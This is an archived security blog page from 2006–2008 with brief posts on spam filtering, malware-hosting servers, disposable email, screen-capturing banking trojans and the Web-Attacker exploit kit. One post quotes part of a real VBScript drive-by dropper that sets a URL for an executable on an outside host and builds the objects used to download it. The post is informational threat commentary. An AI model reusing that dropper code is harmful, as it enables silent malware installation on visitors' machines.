Of Spam & Men

To content | To menu | To search

Saturday 26 January 2008

Google as an RBL

From SecuryTeam:

For those not familiar with RBL, the term means Real-time Blackhole List, it is mainly used for SPAM fighting. I have recently started playing around with Google as an RBL engine, the idea is that if the search term I use hits too many hits it is likely to be SPAM

This is actually interesting, i've been googling urls found in spams for a little while now but those kind of search never return tons of pages, but it does return a few of them, and most of the time they are security related site. This "google rbl" could be pretty usefull coupled with a list of trusted security sites. If the search returns a few urls from those sites, then the mail is likely to be a spam or malware related. What about a mail with "http://securityfocus.com" in the body? uhuh...definitely not bulletproof! So better stick to the IP of the sender and just count the number of hits returned by google.

from securiteam

Thursday 16 August 2007

Web Server Software and Malware

From Google Online Security Blog:

"In this post we investigate the distribution of web server software to provide insight into how server software is correlated to servers hosting malware binaries or engaging in drive-by-downloads."

Their numbers are slightly different from Netcraft's ones, but they give a fairly good explanation about it. According to Google IIS and Apache are sharing the same percentage in the overall malware distributing web servers.

Interesting facts: in the US Malwares are served at 80% by Apache, in China at 95% by IIS...

From Google Online Security Blog

Monday 23 July 2007

Chat^WTroll with malware authors

castlecops.gifCastelcops.com is a popular site aiming at providing informations assisting computer security education. Their forums are particularly useful when you think something fishy's going on. A lot of very well informed people are participating.

Recently a conversation about rogue domains used by the (nasty) zlob malware was posted and the malware author came and tried to explain that his little creation wasn't a malware and that they weren't doing anything bad. No need to tell you the discussion literally went kaboom.

via The SpywareGuide Greynets Blog

Monday 7 May 2007

harvesting using adblock

drivebydownload1.png

Or The Amish Virus through Adwords

Didier Stevens conducted a little experiment: What if he used adword and told people to visit his blog to get infected by a malware? His ad was saying “Is your PC virus-free? Get it infected here!” and it ran for 6 months. Of course clicking on the link would not infect the visitor's computer, but still, it could have. Guess how many people clicked? 409.

409 people wanted their computer infected? well, i guess people dont read. How many person use google to surf, thinking that adwords are actually results given by google?

Saturday 10 March 2007

virus watch: warezov domains

Warezov, Spamthru... Virus used by spammers. They are pretty easy to detect if you can monitor http connections. Indeed more and more viruses will try to fetch data (spam templates or updates) from dedicaded domains. If you can monitor those domains, you can can detect infected computers on your networks.

Continue reading...

Monday 5 February 2007

Online System Security Scanners

Claus Valca posted a long list of online scanners:

  • Primarily virus/trojan related online scanners
  • Single-File Upload Scanners
  • Malware (spyware/adware/etc.) Online Scanners
  • Online "single-file" Multi-Scan Test Websites
  • Software or System Security Vulnerability Scanners
  • Not Quite "Fully-Online" Based Software or System Security Vulnerability Scanners

Continue reading...

Thursday 18 January 2007

68 Gigabytes

68 Gigbaytes is the amount of email addresses f-secure downloaded from a server used by the medbot spam-virus.

Machines infected with Medbot use a client-server architecture. They connect to a central server to get further instructions as well as spam content and address lists. Then they get to the work of actually sending the spam.

The server addresses keep changing. Last week seek21.zootseek.com was used to serve e-mail addresses to the bots. While investigating the case last week, we downloaded some 68 Gigabytes of e-mail addresses from this

Continue reading...

Friday 12 January 2007

Disposable Email Services

A good way to prevent your main email address from being spammed is not using it when creating web accounts or subscribing to websites. Managing different email accounts isn't trivial and dropping a free account when it starts being spammed to open another one in the next minute isn't really usefull either.

What you really need is a temporary email address you can use to prove you're not a robot. One you can throw away as soon as you have used it. That's what disposable email services are for.

Continue reading...

Friday 1 December 2006

Malware against virtual keyboards

malware-virtualkeyboard1.jpg

More and More banking institutions are replacing the usual username/password form with a virtual keyboard. The sole purpose of thie method is to defeat keyloggers.

Unfortunately for them, more and more malwares also defeat the purpose of using virtual keyboards. The guys at VirusTotal analyze a new trojan that performs a series of small screen captures of the area aroundthe mouse cursor.It also adds a red arrow pointing exactly where the user clicked.

Continue reading...

Thursday 23 November 2006

Malware 2.0: Malware utilizes AJAX to install itself


Well, ok, it's not really AJAX. This malware uses an HTML bit using XMLHttpRequest to fetch and download the actual executable. Add some minor obfuscation to fool antiviruses and you get W32/new-malware!Maximus on your harddrive:

[title][/title]
[head][/head]
[body]
[script language=”VBScript”]
on error resume next

‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”

‘ create adodbstream object
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")

Continue reading...

Sunday 19 November 2006

Web-Attacker Exposed

Websense analyzes Web-Attacker. Web-Attacker is the most popular toolkit for building malicious sites. It's supposedly used by one third of the malicious sites discovered:

Dear Friends! We would like to offer you multi-component exploit Web-Attacker, that realizes vulnerabilities in the interne browsers Internet Explorer and Mozilla Firefox. With the help of this exploit you will be able to install any programs on the local disks of visitors of your web pages. In the foundation of work of the exploit Web-Attacker, there are 7 already-known vulnerabilities in the internet browsers.

Objective of the Exploit: Hidden drop of the executable from the deleted source to the local hard drive of the site visitor.

It costs $300 and provides a few files to help you build your own malicious site. Just provide a malware, a keylogger or whatever you want to infect your visitors with.

Continue reading...